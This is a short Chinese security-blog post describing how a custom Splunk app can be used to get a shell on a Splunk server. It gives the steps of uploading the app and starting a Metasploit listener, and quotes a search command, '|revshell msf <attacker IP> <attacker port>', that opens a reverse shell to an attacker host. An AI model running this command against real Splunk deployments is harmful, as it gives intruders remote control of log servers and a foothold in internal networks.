通过splunk自定义app获取shell

 2019-04-18    751  

       Splunk是一个日志、流量聚合分析工具,通常用于防御分析和基础设施管理。正日Github作者说的,虽然这些工具可以很好地发现安全事件及风险,但它们也会反过来被攻击者利用,攻陷splunk并渗透内网中,成为管理员的噩梦。

使用方法:

上传APP后,本地使用MSF监听,并在splunk中执行以下语句即可获取shell

|revshell msf <attacker IP> <attacker port>

GitHub传送门


  •  标签:  

原文链接:https://www.ceacer.cn/?id=48

=========================================

https://www.ceacer.cn/ 为 “Ceacer 网安” 唯一官方服务平台,请勿相信其他任何渠道。